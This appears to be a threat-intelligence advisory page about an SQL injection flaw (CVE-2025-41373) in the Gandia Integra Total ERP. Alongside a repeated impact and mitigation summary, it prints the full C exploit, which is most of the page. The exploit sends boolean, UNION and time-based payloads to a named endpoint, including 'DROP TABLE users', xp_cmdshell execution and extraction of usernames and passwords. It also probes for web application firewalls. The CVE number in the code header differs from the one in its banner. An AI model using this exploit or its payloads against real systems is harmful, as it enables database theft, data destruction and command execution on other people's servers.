Gandia Integra Total 4.4.2236.1 - SQL Injection
Gandia Integra Total 4.4.2236.1 - SQL Injection
AI Analysis
Technical Summary
The security threat concerns an SQL Injection vulnerability in Gandia Integra Total version 4.4.2236.1. SQL Injection is a critical web application vulnerability that allows an attacker to manipulate backend SQL queries by injecting malicious input through user-controllable parameters. This can lead to unauthorized data access, data modification, or even full compromise of the underlying database and potentially the host system. Gandia Integra Total is an enterprise resource planning (ERP) and business management software suite used primarily by companies for managing various business processes. The presence of an SQL Injection vulnerability in this software indicates that input validation or parameterized queries are insufficient or absent in certain parts of the application, allowing attackers to craft malicious SQL statements. The exploit code is publicly available and written in C, which suggests that the exploit might be a standalone program designed to automate the injection process, potentially enabling attackers to exploit the vulnerability remotely with minimal interaction. Although no specific affected versions are listed beyond 4.4.2236.1, the lack of patch links and the absence of known exploits in the wild indicate that this vulnerability might be newly disclosed or under limited active exploitation. However, the availability of exploit code increases the risk of future attacks. Given the nature of ERP systems, which often contain sensitive business data including financial records, customer information, and operational details, exploitation of this vulnerability could lead to significant data breaches, operational disruption, and reputational damage.
Potential Impact
For European organizations using Gandia Integra Total, this SQL Injection vulnerability poses a significant risk. Successful exploitation could lead to unauthorized access to sensitive corporate data, including financial, customer, and employee information, potentially violating GDPR and other data protection regulations. The integrity of business data could be compromised, leading to incorrect business decisions or financial losses. Additionally, attackers might leverage the vulnerability to escalate privileges or move laterally within the network, increasing the scope of compromise. Disruption of ERP services could impact business continuity, affecting supply chains, invoicing, and other critical operations. The reputational damage from a breach could also have long-term consequences, including loss of customer trust and regulatory penalties. Given the medium severity rating and the availability of exploit code, organizations should treat this vulnerability seriously, especially those in sectors with high regulatory scrutiny or those handling sensitive personal or financial data.
Mitigation Recommendations
European organizations should immediately assess their use of Gandia Integra Total to determine if they are running the affected version 4.4.2236.1 or earlier versions potentially vulnerable. Since no official patches are currently linked, organizations should implement compensating controls such as: 1) Conducting a thorough code review and penetration testing focused on SQL Injection vectors within the application to identify vulnerable endpoints. 2) Applying web application firewalls (WAFs) with custom rules to detect and block SQL Injection attempts targeting Gandia Integra Total. 3) Enforcing strict input validation and sanitization on all user inputs, especially those interacting with database queries. 4) Restricting database user permissions to the minimum necessary to limit the impact of a successful injection. 5) Monitoring database logs and application logs for suspicious query patterns or anomalies indicative of injection attempts. 6) Isolating the ERP system within a segmented network zone to reduce lateral movement risk. 7) Engaging with Gandia Integra Total vendors or support channels to obtain patches or official guidance as soon as they become available. 8) Educating internal security teams about the vulnerability and ensuring incident response plans are updated to handle potential exploitation scenarios.
Affected Countries
Spain, Germany, France, Italy, United Kingdom, Netherlands
Indicators of Compromise
- exploit-code: /* * Author : Byte Reaper * CVE : CVE-2025-41373 * Vulnerability : SQL * Affected Path : /encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=<input> * Affected Versions : 2.1.2217.3 to v4.4.2236.1 * Description: * This endpoint concatenates the `idestudio` parameter directly into an SQL query * without proper sanitization or parameterization, allowing an attacker to inject * arbitrary SQL. We leverage both boolean-based and time-based techniques to detect. */ #include <stdio.h> #include <string.h> #include <curl/curl.h> #include "argparse.h" #include <stdlib.h> #include <time.h> #include <unistd.h> #define FULL_URL 4300 int verbose = 0; int useC = 0; const char *url = NULL; const char *cookies = NULL; void sleepSyscall(void) { struct timespec sleepR; sleepR.tv_sec = 1; sleepR.tv_nsec = 0; __asm__ volatile ( "mov $35, %%rax\n\t" "mov %0, %%rdi\n\t" "xor %%rsi, %%rsi\n\t" "syscall\n\t" : : "r" (&sleepR) : "rax", "rdi", "rsi", "rcx", "r11", "memory" ); } void exitAssembly(void ) { __asm__ volatile ( "xor %%rdi, %%rdi\n\t" "mov $0x3C, %%rax\n\t" "syscall\n\t" : : : "rax", "rdi" ); } void uid(void) { const char *mes1 = "\e[1;36m[+] Run Exploit Root Successfully\e[0m\n"; size_t len1 = strlen(mes1); const char *mes2 = "\e[1;31m[-] Please Run Exploit In Root, Exit...\e[0m\n"; size_t len2 = strlen(mes2); __asm__ volatile( "mov $107, %%rax\n\t" "syscall\n\t" "cmp $0, %%rax\n\t" "JZ .root\n\t" "jmp .not_root\n\t" ".root:\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[mes1], %%rsi\n\t" "mov %[len1], %%rdx\n\t" "syscall\n\t" "jmp .end\n\t" ".not_root:\n\t" "mov $1, %%rax\n\t" "mov $1, %%rdi\n\t" "mov %[mes2], %%rsi\n\t" "mov %[len2], %%rdx\n\t" "syscall\n\t" ".end:\n\t" : : [mes1] "r" (mes1), [len1] "r" (len1), [mes2] "r" (mes2), [len2] "r" (len2) : "rax", "rdi", "rsi", "rdx", "rcx", "r11", "memory" ); } const char *payload[] = { "' OR '1'='1", "\" OR \"1\"=\"1", "' OR 1=1 --", "\" OR 1=1 --", "' OR '1'='1' --", "' OR 1=1#", "' OR 1=1/*", "admin'--", "admin' #", "admin'/*", "' OR 1=1-- -", "' OR/**/1=1--", "'/**/OR/**/1=1#", "' OR%%201=1--", "' OR%%091=1--", "' OR%0a1=1--", "' OR%%0b1=1--", "' oR 1=1--", "' Or 1=1--", "' oR/**/1=1--", "' OR 0x31=0x31--", "1; DROP TABLE users --", "1; EXEC xp_cmdshell('dir') --", "UNION SELECT NULL,NULL,NULL --", "UNION SELECT username,password FROM users --", "' UNION SELECT NULL,NULL,NULL --", "' UNION SELECT NULL,NULL,NULL#", ",(select * from (select(sleep(4)))a)", "';WAITFOR DELAY '0:0:4'--", NULL }; const char *word[] = { "SQL syntax", "syntax error", "mysql_fetch", "mysql_num_rows", "You have an error in your SQL syntax", "Warning: mysql", "Warning: pg_", "Unclosed quotation mark", "Microsoft OLE DB Provider for SQL Server", "Microsoft SQL Native Client error", "ODBC SQL Server Driver", "ORA-01756", "ORA-00933", "SQLSTATE", "PDOException", "invalid query", "mysql_numrows()", "mysql_result()", "mysql_query()", "Query failed", "Syntax error", "DB error", "error in your SQL syntax", "Unexpected end of SQL command", "Incorrect syntax near", "user", "admin", NULL }; struct Mem { char *buffer; size_t len; }; size_t write_cb(void *ptr, size_t size, size_t nmemb, void *userdata) { size_t total = size * nmemb; struct Mem *m = (struct Mem *)userdata; char *tmp = realloc(m->buffer, m->len + total + 1); if (tmp == NULL) { printf("\e[1;31m[-] Failed to allocate memory!\e[0m\n"); exitAssembly(); } m->buffer = tmp; memcpy(&(m->buffer[m->len]), ptr, total); m->len += total; m->buffer[m->len] = '\0'; return total; } void clean(char *buffer, size_t len, CURL *curl,char *encode ) { free(buffer); buffer = NULL; len = 0; curl_easy_cleanup(curl); curl_free(encode); } int waf = 0; int wafD(const char *urlW) { CURL *curl = curl_easy_init(); CURLcode res; struct Mem wafServer; wafServer.buffer= NULL; wafServer.len = 0; const char *payloadSql = "OR 1=1 --"; char *encode = curl_easy_escape(curl, payloadSql, strlen(payloadSql)); char full[FULL_URL]; if (!encode) { printf("\e[1;31m[-] Error Encode Payload !\e[0m\n"); clean(wafServer.buffer, wafServer.len, curl, encode); exitAssembly(); } int len = snprintf(full, sizeof(full), "%s/encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=%s", urlW, encode); if (len < 0 || (size_t)len >= sizeof(full)) { printf("\e[1;31m[-] FULL URL Is Long \n"); clean(wafServer.buffer, wafServer.len,curl,encode); exitAssembly(); } if (curl == NULL || !curl) { printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n"); clean(wafServer.buffer, wafServer.len, curl, encode); exitAssembly(); } int result = 0; if (curl) { printf("\e[1;35m===========================================================================================\e[0m\n"); printf("\e[1;35m[+] Scan WAF Start...\e[0m\n"); printf("\e[1;37m[+] FULL URL : %s\e[0m\n", full); curl_easy_setopt(curl, CURLOPT_URL, full); curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_WRITEDATA, &wafServer); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepSyscall(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *h = NULL; h = curl_slist_append(h, "User-Agent: sqlmap"); h = curl_slist_append(h, "Accept-Encoding: gzip, deflate, br"); h = curl_slist_append(h, "Accept-Language: en-US,en;q=0.5"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, h); res = curl_easy_perform(curl); curl_slist_free_all(h); double timeWaf = 0; if (res == CURLE_OK) { int a = 0; int b =1; int c = 3; int d = 4; long code; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &code); curl_easy_getinfo(curl, CURLINFO_TOTAL_TIME, &timeWaf); printf("\e[1;36m[+] Check Http Code...\e[0m\n"); printf("\e[1;32m[+] Http Code => %ld\e[0m\n", code); if (code == 500 || code == 403 || code == 406) { printf("\e[1;35m---------------------------------------\e[0m\n"); printf("\e[1;34m[+] Http Code (500, 403, 406) ! \e[0m\n"); printf("\e[1;34m[+] Waf Detect (Page Not Found) \e[0m\n"); printf("\e[1;35m--------------------------------------\e[0m\n"); a = 1; } else { printf("\e[1;31m[-] Not Detected Waf (HTTP CODE) !\e[0m\n"); } printf("\e[1;36m[+] Check Response Server (NULL)\e[0m\n"); const char *wordWaf[] = { "cloudflare", "sucuri", "mod_security", "incapsula", "akamai", "f5-big-ip", "waf", "firewall", "blocked", "access denied", "forbidden", "security", "protected by", "request rejected", "webshield", "ddos protection", "intrusion prevention", "proxy server", "bot detection", "deny", "you have been blocked", "unauthorized", "client blocked", "blocked by firewall", "bad request", "threat", "filtering", "deny access", "rule id", NULL }; if (code >= 200 && code < 300) { if (wafServer.buffer) { printf("\e[1;35m-------------------------------------------------------------\e[0m\n"); printf("\e[1;34m[+] Http Code (200,202...) ! \e[0m\n"); printf("\e[1;34m[+] Waf Detect, Response is NULL And Http Code Positive \e[0m\n"); printf("\e[1;35m-------------------------------------------------------------\e[0m\n"); b = 1; } else { printf("\e[1;31m[-] Response Buffer Not NULL\e[0m\n"); printf("\e[1;31m[-] Waf Not Detected (NULL Response)!\e[0m\n"); } } printf("\e[1;36m[+] Check Response Buffer...\n"); for (int u = 0; wordWaf[u] != NULL; u++) { if (strstr(wafServer.buffer, wordWaf[u]) != NULL) { printf("\e[1;35m-------------------------------------------------------------\e[0m"); printf("\e[1;34m[+] Waf Detect, Word Waf Found \e[0m\n"); printf("\e[1;34m[+] Word : %s \e[0m\n", wordWaf[u]); printf("\e[1;35m-------------------------------------------------------------\e[0m"); c = 1; } else { if (verbose) { printf("\e[1;31m[-] Word Not Found in Response : %s\e[0m\n", wordWaf[u]); printf("\e[1;35m====================================================\e[0m\n"); } } } printf("\e[1;36m[+] Check Time Response Server...\e[0m\n"); if (timeWaf >= 3.0) { printf("\e[1;34m[+] Suspicious delay in response: %.2f sec\e[0m\n", timeWaf); } else { printf("\e[1;31m[-] Not Detect Waf (Time) !\e[0m\n"); } printf("\e[1;35m==========================\e[0m\n"); printf("\e[1;33m[+] Result Scan : \e[0m\n"); if (a || b || c || d) { printf("\e[1;31m[-] Waf Detected \e[0m\n"); result = 0; } else { printf("\e[1;34m[+] Not Detect Waf !\e[0m\n"); result =1; } printf("\e[1;35m===========================================================================================\e[0m\n"); } else { printf("\e[1;31m[-] No connection reset error.\e[0m\n"); printf("\e[1;31m[-] Error Send Request, Please Check Your Connection !\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } } curl_easy_cleanup(curl); free(wafServer.buffer); wafServer.buffer = NULL; wafServer.len = 0; return result; } void httpRequest(const char *url) { CURL *curl = curl_easy_init(); struct Mem response; CURLcode res; response.buffer =NULL; response.len = 0; if (!curl || curl == NULL) { printf("\e[1;31m[-] Error Create Object CURL !\e[0m\n"); printf("\e[1;31m[-] Please Check Your Connection\e[0m\n"); exitAssembly(); } int y = 0; if (curl) { printf("\e[1;34m[+] Create CURL Successfully\e[0m\n"); for (int pL = 0; payload[pL] != NULL; pL++) { char full[FULL_URL]; char *encodePayload = curl_easy_escape(curl, payload[pL], strlen(payload[pL])); if (!encodePayload) { printf("\e[1;31m[-] Error Encode Payload !\e[0m\n"); clean(response.buffer, response.len, curl, encodePayload); exitAssembly(); } int lenF = snprintf(full, sizeof(full), "%s/encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=%s", url,encodePayload); if (lenF < 0 || (size_t)lenF >= sizeof(full)) { printf("\e[1;31m[-] FULL URL is LONG ! \n"); clean(response.buffer, response.len, curl, encodePayload); exitAssembly(); } printf("\e[1;37m[+] Encode Payload : %s\e[0m\n", encodePayload); printf("\e[1;37m[+] Base URL : %s\e[0m\n", url); printf("\e[1;37m[+] Full URL : %s\e[0m\n", full); char ip[256]; if (sscanf(full, "http://%255[^/]/encuestas/", ip) == 1) { printf("\e[1;37m[+] target Ip / Domain : %s\e[0m\n", (char *)ip); y = 1; } else { printf("\e[1;31m[-] Error Get Target Ip In FULL URL !\e[0m\n"); y = 0; } curl_easy_setopt(curl, CURLOPT_URL, full); if (useC) { curl_easy_setopt(curl, CURLOPT_COOKIEFILE, cookies); curl_easy_setopt(curl, CURLOPT_COOKIEJAR, cookies); } curl_easy_setopt(curl, CURLOPT_FOLLOWLOCATION, 1L); curl_easy_setopt(curl, CURLOPT_WRITEFUNCTION, write_cb); if (verbose) { printf("\e[1;35m------------------------------------------[Verbose Curl]------------------------------------------\e[0m\n"); curl_easy_setopt(curl, CURLOPT_VERBOSE, 1L); } curl_easy_setopt(curl, CURLOPT_WRITEDATA, &response); curl_easy_setopt(curl, CURLOPT_CONNECTTIMEOUT, 5L); sleepSyscall(); curl_easy_setopt(curl, CURLOPT_TIMEOUT, 10L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYPEER, 0L); curl_easy_setopt(curl, CURLOPT_SSL_VERIFYHOST, 0L); struct curl_slist *headers = NULL; headers = curl_slist_append(headers, "Accept-Language: en-US,en"); headers = curl_slist_append(headers, "Connection: keep-alive"); char r[130]; int lenR = snprintf(r, sizeof(r), "Referer: %s", url); if (lenR < 0 || (size_t)lenR >= sizeof(r)) { printf("\e[1;31m[-] Len Header Referer Is long !\e[0m\n"); clean(response.buffer,response.len, curl, encodePayload); exitAssembly(); } headers = curl_slist_append(headers, r); headers = curl_slist_append(headers, "Cache-Control: no-cache"); headers = curl_slist_append(headers, "Content-Type: application/x_222-form-urlencoded"); if (y == 0) { char host[230]; int lenHo = snprintf(host , sizeof(host), "Host: %s",ip); headers = curl_slist_append(headers, host); } headers = curl_slist_append(headers, "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.132 Safari/537.36"); curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers); res = curl_easy_perform(curl); curl_slist_free_all(headers); free(response.buffer); response.buffer = NULL; response.len = 0; time_t start = clock(); if (res == CURLE_OK) { long httpCode = 0; curl_easy_getinfo(curl, CURLINFO_RESPONSE_CODE, &httpCode); printf("\e[1;31m--------------------------------------------------------------------------------------------------------\n"); printf("\e[1;36m[+] Request sent successfully\e[0m\n"); if (response.buffer) { printf("\e[1;34m\n======================================== [RESPONSE] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;34m==============================================================================================\e[0m\n"); } else { printf("\e[1;31m[-] Response Is NULL !\e[0m\n"); } if (httpCode >= 200 && httpCode < 300) { for (int o = 0; word[o] != NULL; o++) { printf("\e[1;36m[+] Positive Http Code (200 < 300) : %ld\e[0m\n",httpCode); if (response.buffer) { if (strstr(response.buffer, word[o]) != NULL) { printf("\e[1;34m[+] Word Found In Response : %s\e[0m\n", word[o]); printf("\e[1;34m[+] The vulnerability CVE-2025-41373 exists on the server\e[0m\n"); printf("\e[1;35m\n======================================== [RESPONSE] ========================================\e[0m\n"); printf("%s\n", response.buffer); printf("\e[1;32m[Len] : %zu\e[0m\n", response.len); printf("\e[1;35m==============================================================================================\e[0m\n"); } else { if (verbose) { printf("\e[1;31m[-] Word Not Found In Response : %s\e[0m\n", word[o]); } continue; } } } time_t end = clock(); double totalTime = (double)(end - start) / CLOCKS_PER_SEC; if (totalTime <= 5.5) // Payload Sleep 4s + Assembly Sleep (1s) = 4 + 1 + 0.5 (Time (LIBCURL)) = 5.5 { printf("\e[1;33m[+] Check Time Base....\e[0m\n"); printf("\e[1;34m[+] Time Based Injection Detected .\e[0m\n"); printf("\e[1;34m[+] Total Time Sleep Server : %f\e[0m\n", totalTime); } else { printf("\e[1;31m [-] Time Based Injection Not Detected !\e[0m\n"); } } else { printf("\e[1;31m[-] HTTP Code Not Range Positive (200 < 300) : %ld\e[0m\n", httpCode); } } else { printf("\e[1;31m[-] Error Send Request\e[0m\n"); printf("\e[1;31m[-] Error : %s\e[0m\n", curl_easy_strerror(res)); } printf("\e[1;34m[+] Try Next Payload SQL : %s\e[0m\n", encodePayload); } } response.buffer = NULL; response.len = 0; curl_easy_cleanup(curl); } int main(int argc, const char **argv) { printf( "\e[1;31m" "▄▖▖▖▄▖ ▄▖▄▖▄▖▄▖ ▖▖▗ ▄▖▄▖▄▖ \n" "▌ ▌▌▙▖▄▖▄▌▛▌▄▌▙▖▄▖▙▌▜ ▄▌ ▌▄▌ \n" "▙▖▚▘▙▖ ▙▖█▌▙▖▄▌ ▌▟▖▄▌ ▌▄▌ \n" "\e[1;37m \t\tByte Reaper\e[0m\n" ); curl_global_init(CURL_GLOBAL_DEFAULT); int noColor = 0; int w = 0; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &url, "Target IP "), OPT_STRING('c', "cookies", &cookies, "cookies File"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_BOOLEAN('w', "waf", &w, "Scan Waf"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (url == NULL) { printf("[-] Please Enter Target URL !\n"); printf("[-] Ex : ./exploit -u <URL> \n"); curl_global_cleanup(); exitAssembly(); }; printf("---------------------------------------------------------------------\n\n"); printf("[+] Start Exploit (CVE-2025-54589)...\n"); uid(); if (cookies) { useC = 1; } if (verbose) { verbose = 1; } if (w) { wafD(url); } else { httpRequest(url); } curl_global_cleanup(); return 0; }
Gandia Integra Total 4.4.2236.1 - SQL Injection
Description
Gandia Integra Total 4.4.2236.1 - SQL Injection
AI-Powered Analysis
Technical Analysis
The security threat concerns an SQL Injection vulnerability in Gandia Integra Total version 4.4.2236.1. SQL Injection is a critical web application vulnerability that allows an attacker to manipulate backend SQL queries by injecting malicious input through user-controllable parameters. This can lead to unauthorized data access, data modification, or even full compromise of the underlying database and potentially the host system. Gandia Integra Total is an enterprise resource planning (ERP) and business management software suite used primarily by companies for managing various business processes. The presence of an SQL Injection vulnerability in this software indicates that input validation or parameterized queries are insufficient or absent in certain parts of the application, allowing attackers to craft malicious SQL statements. The exploit code is publicly available and written in C, which suggests that the exploit might be a standalone program designed to automate the injection process, potentially enabling attackers to exploit the vulnerability remotely with minimal interaction. Although no specific affected versions are listed beyond 4.4.2236.1, the lack of patch links and the absence of known exploits in the wild indicate that this vulnerability might be newly disclosed or under limited active exploitation. However, the availability of exploit code increases the risk of future attacks. Given the nature of ERP systems, which often contain sensitive business data including financial records, customer information, and operational details, exploitation of this vulnerability could lead to significant data breaches, operational disruption, and reputational damage.
Potential Impact
For European organizations using Gandia Integra Total, this SQL Injection vulnerability poses a significant risk. Successful exploitation could lead to unauthorized access to sensitive corporate data, including financial, customer, and employee information, potentially violating GDPR and other data protection regulations. The integrity of business data could be compromised, leading to incorrect business decisions or financial losses. Additionally, attackers might leverage the vulnerability to escalate privileges or move laterally within the network, increasing the scope of compromise. Disruption of ERP services could impact business continuity, affecting supply chains, invoicing, and other critical operations. The reputational damage from a breach could also have long-term consequences, including loss of customer trust and regulatory penalties. Given the medium severity rating and the availability of exploit code, organizations should treat this vulnerability seriously, especially those in sectors with high regulatory scrutiny or those handling sensitive personal or financial data.
Mitigation Recommendations
European organizations should immediately assess their use of Gandia Integra Total to determine if they are running the affected version 4.4.2236.1 or earlier versions potentially vulnerable. Since no official patches are currently linked, organizations should implement compensating controls such as: 1) Conducting a thorough code review and penetration testing focused on SQL Injection vectors within the application to identify vulnerable endpoints. 2) Applying web application firewalls (WAFs) with custom rules to detect and block SQL Injection attempts targeting Gandia Integra Total. 3) Enforcing strict input validation and sanitization on all user inputs, especially those interacting with database queries. 4) Restricting database user permissions to the minimum necessary to limit the impact of a successful injection. 5) Monitoring database logs and application logs for suspicious query patterns or anomalies indicative of injection attempts. 6) Isolating the ERP system within a segmented network zone to reduce lateral movement risk. 7) Engaging with Gandia Integra Total vendors or support channels to obtain patches or official guidance as soon as they become available. 8) Educating internal security teams about the vulnerability and ensuring incident response plans are updated to handle potential exploitation scenarios.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52388
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for Gandia Integra Total 4.4.2236.1 - SQL Injection
/* * Author : Byte Reaper * CVE : CVE-2025-41373 * Vulnerability : SQL * Affected Path : /encuestas/integraweb_v4/integra/html/view/hislistadoacciones.php?idestudio=<input> * Affected Versions : 2.1.2217.3 to v4.4.2236.1 * Description: * This endpoint concatenates the `idestudio` parameter directly into an SQL query * without proper sanitization or parameterization, allowing an attacker to inject * arbitrary SQL. We leverage both boolean-based and time-based tech... (23043 more characters)
Threat ID: 68900844ad5a09ad00dd9e0b
Added to database: 8/4/2025, 1:09:24 AM
Last enriched: 8/25/2025, 1:23:06 AM
Last updated: 9/10/2025, 1:01:54 PM
Views: 32
Related Threats
HiddenGh0st, Winos and kkRAT Exploit SEO, GitHub Pages in Chinese Malware Attacks
HighSamsung Fixes Image Parsing Vulnerability Exploited in Android Attacks
MediumSamsung patches actively exploited zero-day reported by WhatsApp
CriticalU.S. CISA adds Dassault Systèmes DELMIA Apriso flaw to its Known Exploited Vulnerabilities catalog
MediumAkira ransomware exploiting critical SonicWall SSLVPN bug again
CriticalActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.